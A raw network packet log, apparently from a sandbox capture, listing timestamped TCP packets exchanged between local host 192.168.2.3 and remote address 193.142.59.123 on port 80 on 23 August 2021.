Aug 23, 2021 02:08:38.191932917 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191935062 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191956043 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191957951 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191975117 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191983938 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191999912 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192008972 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192022085 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192040920 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192042112 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192063093 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192068100 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192084074 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192091942 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192105055 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192112923 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192126036 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192145109 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192146063 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192166090 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192169905 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192193985 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192198038 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192213058 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192219973 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192234039 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192250967 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192254066 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192272902 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192275047 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192295074 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192298889 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192313910 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192336082 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192343950 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192354918 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192358017 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192378044 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192392111 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192399025 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192416906 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192419052 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192441940 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192445993 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192465067 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192468882 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192488909 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192492962 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192512035 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192533970 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192543983 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192553997 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192554951 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192574024 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192579031 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192595959 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192609072 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192615986 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192636013 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192651987 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192656040 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192660093 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192679882 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192679882 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192703009 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192723036 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192723989 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192744017 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192748070 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192764997 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192785025 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192785978 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192805052 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192805052 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192826986 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192837954 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192850113 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192854881 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192888021 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192890882 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192910910 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192925930 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192931890 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192940950 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192953110 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192971945 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192980051 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.192992926 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.192995071 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.193013906 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.193038940 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.193039894 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.193048954 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.193059921 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.193073988 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.193082094 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.193100929 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.193101883 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.193128109 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.193151951 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.224276066 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.224333048 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.224365950 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.224386930 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.224426985 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.224873066 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.224935055 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.224975109 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.225008011 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.225049973 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.225054979 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.225158930 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.225203991 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.225208998 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.225244045 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.225260019 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.225274086 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.225290060 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.225303888 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.225322008 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.225332975 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.225356102 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.225373983 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.225373983 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.225404024 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.225431919 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.225445986 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.225469112 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.225486994 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.225497961 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.225522995 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.225528955 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.225555897 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.225563049 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.225583076 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.225595951 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.225600958 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.225630045 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.225663900 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.225681067 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.225696087 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.225713015 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.225728989 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.225753069 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.225759983 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.225775957 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.225784063 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.225797892 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.225805998 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.225819111 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.225838900 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.225840092 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.225861073 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.225872993 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.225879908 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.225902081 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.225918055 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.225922108 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.225945950 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.225953102 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.225969076 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.225987911 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.225991964 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.226015091 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.226026058 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.226038933 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.226056099 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.226059914 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.226083994 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.226089001 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.226110935 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.226110935 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.226133108 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.226138115 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.226152897 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.226171017 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.226172924 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.226195097 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.226196051 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.226217031 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.226234913 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.226236105 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.226254940 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.226259947 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.226274967 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.226294041 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.226294994 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.226314068 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.226334095 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.226336956 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.226356983 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.226366043 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.226380110 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.226388931 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.226399899 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.226418972 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.226425886 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.226438999 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.226457119 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.226457119 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.226478100 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.226485968 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.226499081 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.226522923 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.226526976 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.226543903 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.226562977 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.226569891 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.226583004 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.226600885 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.226603031 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.226623058 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.226624012 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.226644039 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.226664066 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.226682901 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.226723909 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.255331993 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.255377054 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.255434036 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.257637024 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.257710934 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.257787943 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.257839918 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.257859945 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.257936954 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.257967949 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258054972 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258166075 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.258230925 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258260012 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258280039 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.258281946 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258306026 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258313894 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.258330107 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258342028 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.258358002 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258362055 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.258380890 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258388042 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.258403063 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258423090 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258424044 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.258444071 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258444071 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.258465052 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258474112 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.258486986 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258507967 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258508921 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.258532047 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258554935 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258574963 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258596897 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258616924 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258636951 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258658886 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258678913 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258681059 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.258703947 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258728027 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258749008 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258749962 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.258770943 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258778095 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.258791924 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258810997 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.258811951 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258832932 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.258833885 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258856058 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258857012 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.258881092 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258893013 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.258903980 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258908033 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.258924961 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258934975 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.258946896 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258965969 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.258968115 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258989096 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.258990049 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.259008884 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259012938 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.259028912 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259040117 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.259054899 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259078026 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259078979 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.259099960 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259128094 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.259141922 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259166002 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259169102 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.259187937 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259196997 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.259208918 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259231091 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259237051 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.259253025 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259274960 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.259278059 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259299994 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.259300947 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259322882 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259341955 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.259349108 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259370089 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259380102 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.259391069 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259411097 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259418011 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.259432077 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259457111 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259459019 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.259479046 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259484053 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.259501934 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259526014 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259533882 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.259548903 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259572983 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259574890 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.259596109 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259599924 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.259619951 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259639025 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.259646893 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259671926 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259675980 CEST	49735	80	192.168.2.3	193.142.59.123
